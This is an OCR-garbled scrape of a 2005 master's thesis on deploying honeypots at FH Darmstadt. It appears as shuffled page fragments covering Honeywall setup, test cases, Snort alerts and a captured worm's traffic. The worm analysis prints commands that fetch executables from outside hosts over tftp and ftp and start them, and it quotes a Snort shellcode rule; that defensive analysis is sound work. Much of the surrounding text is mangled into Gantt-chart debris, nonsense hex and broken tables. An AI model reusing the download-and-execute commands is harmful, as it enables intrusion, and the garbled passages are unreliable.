108. sis Conclusion final report hand in Master s thesis Anfang Fre 31 12 04 Fre 31 12 04 Fre 31 12 04 Mit 12 01 05 Fre 25 02 05 Die 01 03 05 Die 01 03 05 Die 01 03 05 Fre 18 03 05 Mon 21 03 05 Mon 21 03 05 Mon 04 04 05 Mon 04 04 05 Mon 18 04 05 Fre 03 06 05 Die 07 06 05 Die 07 06 05 Don 30 06 05 Vorgang Projekt project plan Datum Die 28 06 05 Unterbrechung In Arbeit Ende Jan o5 Feb 05 Mrz 05 Apr OS Mai 05 un 05 Jul 05 ORE OTE 20 27 103 110 117 124 131 107 14 121 128 107 114 121 128 04 111 118 125 02 los 16 23 30 06 13 120 27 04 111 Fre 04 02 05 E Fre 25 02 05 Fre 25 02 05 Fre 25 02 05 Fre 18 03 05 Fre 18 03 05 Fre 18 03 05 Fre 18 03 05 Fre 03 06 05 Fre 01 04 05 Fre 27 05 05 Fre 03 06 05 Fre 27 05 05 Fre 03 06 05 Don 30 06 05 Don 30 06 05 Don 30 06 05 Meilenstein Extemer Meilenstein Projaktsammelvorgang yy Stichtag Exteme Vorg nge EXT Sammelvorgang Seite 1 figure 4 1 project plan The first phase of the project concentrates on gathering knowledge about Honeypots and defining requirements The goal of this phase is to learn about existing Honeypot concepts and architectures as well as using that knowledge to define requirements specific for the department of Informatics at FH Darmstadt The Development phase concentrates on selecting a particular solution and preparing the requirements for an experiment At
109. sort ds 20 094350 230 192 168 10 39 142 0 24 58 TEP microsoFt ds gt 3673 Seg 0 ACk 1444 Win 17280 Len 0 4 0 177720 84 58 142 230 192 168 10 39 fal Continuation to 1 3673 gt microsoft ds ACK Seq 1444 ack 0 5 0 258705 E4 58 142 230 192 168 10 39 TCP Continuation to 1 3673 gt microsoft ds PSH ACK 5eq 2884 A BO 260805 192 168 10 39 B4 58 142 230 TEP microsoft ds gt 36 3 ACE Sege0 Ack 4291 Win 17280 Len 0 7 0 426134 192 168 10 31 B4 58 143 230 SME Session Setup And Response Error STATUS_ACCESS VIOLATION w Frame 2 1494 bytes on wire 1494 Bytes capture A Ethernet II Src 00 30 c5 c7 d6 76 Ost 00 10 46 50 aa 77 a Internet Protocol Src Addr 84 58 142 230 84 58 142 230 Ost Addr 192 168 10 39 192 168 10 39 Transmission Control Protocol Sree Port 3673 3673 Ost Port microsoft ds 445 Seq 4 Ack 0 Len 1440 Source port 3673 3673 Destination port microsofFt de 445 Sequence number 4 relative sequence number Next sequence number 1444 relative sequence number 0 eb Ud bo er ce el bU bH Ya Te Ba Ue hy TT es en ee Morsa ee A 0530 ee ff FF FP 63 6d 64 20 Ff 63 20 4 66 74 70 20 Ema e tftp 540 2d 69 20 38 34 Ze 35 38 Ze 31 34 32 le 32 33 30 184 58 142 230 550 20 47 45 54 20 4d 53 41 53 50 33 32 26 65 78 65 GET MSA 5P32 exe 560 26 73 f4 61 F2 Ft 20 dd 5 gt 41 53 50 22 32 e b Estart M SASP32 6 1570 7A 65 26 65 78 69 74 00 42 de 42 42 42 di 42 42 88x10 EBERBEBRE
110. ss in the stack the hacker does not know where exactly the code with the wanted instruction is placed Therefore a landing zone with no operation instructions is used to find the wanted code In this case the programmer did not use the NOP operation but the INC EBX instruction CC 0x43h INC EBX Intel 97 which increments the EBX register Actually instruction 0x90 is the official NOP no operation instruction but the worm code does not care about the state of the registers so INC EBX can be used as a NOP Packet 2 and 4 contain some shellcode To be able to read it properly the flows need to be reassembled To do this the packet capture is loaded in Ethereal and the analyze function Follow TCP stream is applied Now the stream is searched for human readable commands cmd 7 ECn6 0pen 205 177 7321 58739 gt Cco0t1m s asp cmd c echo user wh0re gotfucked gt gt cdtime asp cmd c echo binary gt gt cdtime asp cmd c echo get kimo exe gt gt cdtime asp cmd c echo bye gt gt cdtime asp sema Je LEO exe n speadtime asp amp cmd c del cdtime asp amp start kimo exe figure 5 18 extracted code The executable cmd exe is used in Windows NT Windows 2000 Windows XP and Windows 2003 server to open a command shell Option c is used to close the shell after completion Echo is used in batch commands to output text With the operator gt the standard output is redirected from the console to the targ
111. supported main memory min 256MB but not very performant sugg 512MB or more harddisk 4GB sufficient for experimental systems sugg 10GB or more the basis installation occupies about 550MB Honeynet Projekt Hhttp www honeynet org tools cdrom Roo iso currentH 21 Handbuch Roo Hhttp www honeynet org tools cdrom Roo manual H 2 ASCII Problem Hhttp www md5summer org ascii H Page B 37 Improving network security with Honeypots IDE or SCSI currently the following SCSI controllers are supported see online manual for up to date list ESO E aperu ano I oman ages Je mm fomne figure 1 overview of supported controllers 3 Online Handbuch Roo Hhttp www honeynet org tools cdrom Roo manual 2 require htmlH Page B 38 Improving network security with Honeypots network adapter min 2 NICs sugg 3 for using the remote management interface optional the following network controllers are supported see online manual for up to date list 3c501 de600 hamachi ppp_deflate sungem_phy 3c503 de620 hp100 ppp_generic sunhme 3c505 depca hp pppoe tg3 3Cc507 dgrs hp plus pppox tlan racse00 fea Im fop oeron amd8111e ns83820 smc ultra dmfe atp pcnet32 starfire tulip b44 sundance winbond 840 forcedeth ppp _async sungem xircom_cb Figure 2 supported network adapters CDROM only for installation 2 2 Setup Before installing please make sure that the target hard disk is empty
112. t many people are still not aware of their use or even think that security patches ruin their computers On the other hand there are many institutions which are not allowed to update their operating system by contract This is due to a service contract which guarantees the function of a product under specified conditions Usually those contracts are not updated as soon as a Security fix is available Therefore the hole could be fixed but is not It is desirable to hope that the improved security awareness of the customers might enforce the vendors update those contracts in shorter periods Page 22 Improving network security with Honeypots 4 Planning a Honeypot for FHD The practical approach to determine a Honeypot solution was divided in four phases analysis development realization and conclusion phase This chapter describes the project plan for the experiment in general and discusses the analysis and development phase Details of the realization phase can be found in chapter 5 Nr Vorgangsname 1 Analysis 2 general project planning task definitic research for current techniques requirements analysis Development evaluation of current solutions all 4 5 hand in requirements catalogue 6 7 8 planning of an experimental Honeypo 9 hand in setup description for a Honey 10 Realization implementation of am experimental H field trial results analysis Improving the Honeypot finish of results analy
113. te the demands to Honeypots The use of a Honeypot poses risk see 3 5 and needs exact planning ahead to avoid damage Therefore it is necessary to consider what environment will be basis for installation According to the setup the results are quite different and need to be analyzed separately For example the amount of attacks occurring in a protected environment Scenario ll see 3 2 are less than the number of attacks coming from the internet see 5 4 for detailed results at least they should Therefore a comparison of results afterwards needs to focus on the environment In every case there is a risk of using a Honeypot Risk is added on purpose by the nature of a Honeypot A compromised Honeypot in Hacker terms an owned box needs intensive monitoring but also strong controlling mechanisms Scenario VI discusses requirements on a Honeypot out of the box solution and elaborates different functions which have to be provided 3 1 Scenario I unprotected environment In an unprotected environment any IP address on the internet is able to initiate connections to any port on the Honeywall The Honeypot is accessible within the entire internet Honeypot w public IP or w private IP Internet figure 3 1 unprotected environment Page 13 Improving network security with Honeypots An adequate setup needs to ensure that the monitoring and logging capabilities are sufficient of handling large numbers of packets An e
114. tering date and time Windows 2000 XP 6 Verify that the time is corresponding to your chosen time Pass Fail 3 1 4 Verification Verify that R001 date and time is satisfied with steps 2 4 and 6 Results Summary figure 5 1 example of a test case Page 42 Improving network security with Honeypots 5 2 Internet attacks The following chapter will investigate attacks from the internet in general The information is based on experiences made during the experiment and supplemented by investigation on background details Chapter 5 2 1 will explain what can be attacked and the chapter afterwards will describe an example of an attack As Microsoft Windows operating systems were used for the Honeypots part of the discussion will refer to attacks targeting Windows 5 2 1 Targets for hackers Communication on the internet is established by the internet protocol suite Underlying basis is internet architecture which must be supported by every host RFC 1122 The protocol layers used in the Internet architecture are as follows application layer The application layer is the top layer of the Internet protocol suite It contains data which is directly handled by application and processes We distinguish two categories of application layer protocols user protocols that provide service directly to users HTTP FTP SMTP support protocols that provide common system functions DNS BOOTP SNMP
115. the end a setup description should define the basis for the next phase lt is also the end of the theoretical work Page 23 Improving network security with Honeypots Practical tasks start with the realization phase It is based on practical research and empirical analysis Evaluated results will be taken into consideration for improving requirements The goal is to state if the selected Honeypot solution is suitable for productive use at FH Darmstadt To support this statement it is necessary to understand and control the solution s potential and features In final phase the gathered results and conclusions are summarized A statement will show if the Honeypot solution is feasible Results of the preceding phases will support this statement 4 1 Environment analysis The purpose of this project is to improve network security at the computer science department of FH Darmstadt Hence it is necessary to understand the type of location the network to apply the scenarios of chapter 3 The FH campus network is consisting of the public address range 141 100 0 0 24 It is a subnets of the public internet address of the DFN the German Research Network Deutsches Forschungsnetz The address range is in accordance to Scenario III public address The campus border gateway is protected by a firewall Inbound traffic is denied by default and only permitted to particular hosts such as webservers Correspondent scenario is Scenario Il
116. thered to flows to reduce the amount of items to be analyzed This includes bi directional traffic to and from the target The challenge is to categorize each flow It is easy to assign a purpose to a flow by checking the destination port In most cases this is satisfactory but in some circumstances a flow to a specified port does not contain valid data or it might be a port scan Therefore categorizing a flow by its port number is not always valid Intrusion Detection Systems IDS help identifying further UDP connections are stateless and do not provide an extra options to relate them to an individual flow The IDS Snort by Martin Roesch Roesch 05 defines a flow as unique when the IP protocol source IP source port destination IP and destination port are the same In the Internet Protocol version 4 IPv4 RFC791 there is an 8 bit field called Protocol to identify the next level protocol It is difficult to analyze protocols which are neither TCP nor UDP as most analysis tools i e Snort see 4 4 1 are based on these protocols Page 19 Improving network security with Honeypots 3 6 4 Accessibility Well grounded setups cover security and promote easy and complete ways to analyze data Further an operator needs quick access to this data Also a way of notifying of events needs to be implemented In order to check data and logs frequently the operator needs physical or network access Direct access to the console is p
117. tive on the wrong interface IPs could be false set and so on Ensure the physical and logical devices on the machines are correctly set The network adapters mapping and cabling have to match with the desired networks EthO is normally used for the production network eth1 for the Honeynet and eth2 for the remote management interface 1 The phone number for this service is 49 531 51 20 38 an quick description of the european telephone time code can be found on http www ptb de en org 4 44 442 index htm NTP server of PTB are at ptbtime1 ptb de 192 53 103 103 and ptbtime1 ptb de 192 53 103 104 12 Ateco offers the Expert mouseCLOCK which is a good priced and reliable device http www ateco de funkuhren htm another vendor is Meinberg http www meinberg de Page 37 Improving network security with Honeypots On a real machine you can compare the MAC addresses by invoking ifconfig with the ones printed on the cards VMware assigns ethO NIC1 eth1 NIC2 and eth2 NIC3 Verify that each NIC is mapped to the proper network connection See figure 5 3 for more details This is also a very basic and important requirement A Honeypot without connectivity without the chance of receiving attacks is absolutely worthless R004 Need Ex Attain R005 Need ExX Attain Honeypot is able to establish outbound and inbound connections to the external network Honeypot is able to access the interna
118. to establish outbound and inbound connections to the internal network using the IP protocol Honeypot should be able to establish outbound and inbound connections to the internet using the IP protocol Honeypot should be able to resolve internet DNS addresses Honeypot is denied access to restricted IP addresses Honeywall is logging traffic from R001 Walleye is activated and accepting logins Walleye is displaying current time Walleye is displaying traffic from R001 Honeywall sends alert messages Sebek is running Page B 6 Improving network security with Honeypots 3 Test Cases 3 1 Test Case 1 time and date 3 1 1 Purpose Verify that requirement R001 has been satisfied Honeypot and the Honeywall are set with correct time and date 3 1 2 Setup Precondition The basic setup has been done see section 1 2 This test requires a watch 3 1 3 Execution 1 check time and date on the Honeywall entering date 2 Verify that the time is corresponding to your chosen time Pass Fail 3 check time and on the Honeypot entering date and time Win 4 Verify that the time is corresponding to your chosen time Pass Fail 5 check time and on the Honeypot entering date and time Win 6 Verify that the time is corresponding to your chosen time Pass Fail 3 1 4 Verification Verify that R001 date and time is satisfied with steps 2 4 and 6 3 1 5 Results Summary Page B 7
119. ur ECHO replies Pass Fail from hplP 16 Honeypot pings attacker by executing ping lt attIP gt 17 Observe that the Honeypot gets minimum of four ECHO Pass Fail replies from attlP 3 3 4 Verification Verify that R003 internal IP functionality is satisfied with steps 15 and 17 3 3 5 Results Summary Page B 9 Improving network security with Honeypots 3 4 Test Case 4 external IP functionality 3 4 1 Purpose Verify that requirement R004 has been satisfied and the Honeypot is reachable within the internet 3 4 2 Setup Precondition The basic setup has been done see section 1 2 The attacker has an IP from the internet No other setup is necessary 3 4 3 Execution 18 Attacker pings Honeypot by executing ping lt hplP gt O 19 Observe that the attacker gets minimum of four ECHO replies Pass Fail from hplP 20 Honeypot pings attacker by executing ping lt attIP gt yyy 21 Observe that the Honeypot gets minimum of four ECHO Pass Fail replies from attlP 3 4 4 Verification Verify that R004 external IP functionality is satisfied with steps 19 and 21 3 4 5 Results Summary Page B 10 Improving network security with Honeypots 3 5 Test Case 5 DNS functionality 3 5 1 Purpose Verify that requirement R005 has been satisfied and the Honeypot is able to resolve internet addresses 3 5 2 Setup Precondition Setup is the same as in
120. ut when functioning Walleye is the tool of choice Attain If this error occurs it might be due to a bad installation Download the Roo image again and reinstall it Page 40 Improving network security with Honeypots This might occur even if the MD5 checksum of the iso image matches Sometimes this is due to a bad CD R011 Honeywall sends alert messages Need Roo sends alert messages to inform the operator of a compromised Honeypot see swatch in 4 4 1 Ex The receiving mail server could refuse mails because the mail address is not of its domain Attain Open menu choose 4 Honeywall configuration then 6 Alerting and enter email address Sometimes it can be desirable to disable this feature Especially in scenario 1 where the Honeynet is connected to the internet and receives hundreds of alerts an hour In this case alerting could become too noisy R012 Sebek is running Need Sebek is providing information on malicious activities performed on the Honeypot Ex Sebek could be installed but not configured Attain Install Sebek on the Honeypot and run the configuration utility A hacker might use an encrypted connection to the Honeypot In this case the network dump is not revealing his activities Sebek is secretly logging keystrokes and event messages It sends gathered data to a specified MAC address and hides this traffic to the intruder 5 1 1 Test case template The following sectio
121. ws Network LP LLLP released June 20 2005 Fyodor pseudonym Network Mapper www insecure org nmap index html Insecure Inc last request June 05 2005 The Honeynet Project Know Your Enemy Learning about security Threats 2nd Edition Addison Wesley 2004 Lance Spitzner et al The Honeynet Project Research Alliance http www honeynet org Honeynet last request June 25 2005 IANA IANA address database Internet protocol v4 address space http www iana org assignments ipv4 address space The Internet Assigned Number Authority last request June 25 2005 author unknown Intel Architecture Software Developer s Manual Volume 2 Instruction Set Reference Intel Corporation 1997 Kaspersky Lab Virus Top Twenty for December 2004 htip www kaspersky com news id 157640844 Kaspersky Lab 2005 released Jan 12 2005 Dieter Kirchner Hubert Re ler Zeit bertragung ber Telefonmodems Verlag Sprache und Technik 1993 Page A 1 Mastercard 05 Microsoft 02 Microsoft 03 Microsoft 05 OSI 94 Priester 04 Provos 02 Roesch 05 RFC 791 RFC 793 Page A 2 Improving network security with Honeypots MastCard News Releases MasterCard International Identifies Security Breach at CardSystems Solutions http www mastercardinternational com cgi bin newsRoom cgi id 1038 Mastercard International released June 17 2005 author unknown Common Internet File System CIFS File Access Protocol vers
122. xperiment based on this scenario recorded approximately 597 packets a second see appendix B 4 rec June 19 2005 Depending on the current propagation of worms in the internet this can be more or less The monitoring device the Honeypot or an external monitor needs enough resources to handle the huge amount of traffic The type of address of the Honeypot can be public or private def of public and private addresses in 3 3 and 3 4 The type of network addresses the Honeypot is located in is defined in Scenario Ill resp Scenario IV If specifying a setup Scenario and ll can not occur alone Both have to be used in conjunction with either Scenario Ill or Scenario IV The reason for this is a limitation described in Scenario IV 3 2 Scenario Il protected environment In this scenario the Honeypot is connected to the internet by a firewall The firewall limits the access to the Honeypot Not every port is accessible from the internet resp not every IP address on the internet is able to initiate connections to the Honeypot This scenario does not state the degree of connectivity it only states that there are some limitations However those limitations can be either strict allowing almost no connection or loose only denying a few connections The firewall can be a standard firewall or a firewall with NAT capabilities see chapter 3 3 However a public IP address is always assigned to the firewall o r Firewall Honeypot
123. y 1 TCP 84 58 LO eZee TO 2 192 188 10 3922425 067 23 1 71353534216711 Ay 17181390351 SHEELCODE X96 ima ebx NOOP gt Classification Executable code was detected Priority 1 TCP 642562107 692247 FO gt 192 188 10 393225 figure 5 15 full alert details The rule which triggered this alert is found in the Snort rules in the file shellcode rules in the directory etc hflowd snort rules on the Honeywall The list after the rule example lists what each entry or keyword is used for alert ip SEXTERNAL NET SSHELLCODE_ PORTS gt SHOME_NET any msg SHELECODE x66 Ln GHOX NOOR Gontent s CCCCECCCCECCECCCCC CECE CCE classtype shellcode detect sid 1390 rev 5 figure 5 16 Snort rule for detecting shellcode Teen Rule action generate an alert using the selected alert method and then log the packet Rule header specifies the protocol that rule applies to EXTERNAL_NET Rule header variable specifying information about the source address In this case the variable was set in etc hflowd snort snort conf to any figure 5 17 details of a Snort alert 16 full Snort flow details can be extracted from rule evaluation by clicking on the magnifying glass icon and chosing rule evaluation 7 currently Snort supports IP TCP UDP and ICMP only see 4 4 1 Page 57 Improving network security with Honeypots SHELLCODE_PORTS Rule header variable specifying information about t
124. ynuiw HAe eace rizs INOU BAe 96 EDEZ8b INOY HAR BESBg gZr Inoy BAe 66582 1210 SHA 06264611 12301 sad 9870 2 0 SMO 19581c 9261 L8008EC LLELE PicS6l6 OOL 5169 SEE l 6889 P NERESI en A ER E90 0 08236 esessseeessecessessesocsossessoseo E EN EEE DAAN p s01019U BEL 1 9125 G00 82 21 21 El UNP UOW PUB 5002 52 21 71 cb UNf ES UdaMjag HOO jsp Aq PajebalbOy SMOlJ PSIEDSIRRY B A Records of Roo Die and Roo Mue Page B 34 Improving network security with Honeypots dXUIM n 004 JO S NSIA pajlelop Z vg ainby es1z 968 ynuluyBAe Mir FLE OIFBF aynuiw bae 688917 F aynu uyBAe 262 0858 Jnou hae S 229206c Jnoushae 85 907 INOY HAR 647658 1210 syd 66629269 1810 said 8519 1210 SMO cverivedc terase 6980e9r O01 562005 DE LPOP LSEP 0817 000 DO D EIN BELL sespeola 0 Belet Gcpeocs GE BES A E AS E A A REE A A A EEE e ticonte Tell Bco 192 6867 bop ss soimau sei E SMA JD8s spod 150 Spod ous spalv smog HO 80 5002 00 00 21 02 UNF UoN pue 5002 00 00 21 61 unf UNS Uaampsg HOO jsp Aq Pajedalbby SM0 PajeNasiony Page B 35 Improving network security with Honeypots 000ZUIM 9I1G 004 JO SINS Pajlelop pg sinby 842206231 aynuluyBAe LLLL9EzZ O amumuDae 1111980 0 amunybae 2999 r 22 snousfae 29999 FL Jnou fae 999991 S INOY HAR 8581 230 spd Ore 230 say bz 1210 SMO 000 0 AA E
Download Pdf Manuals
Related Search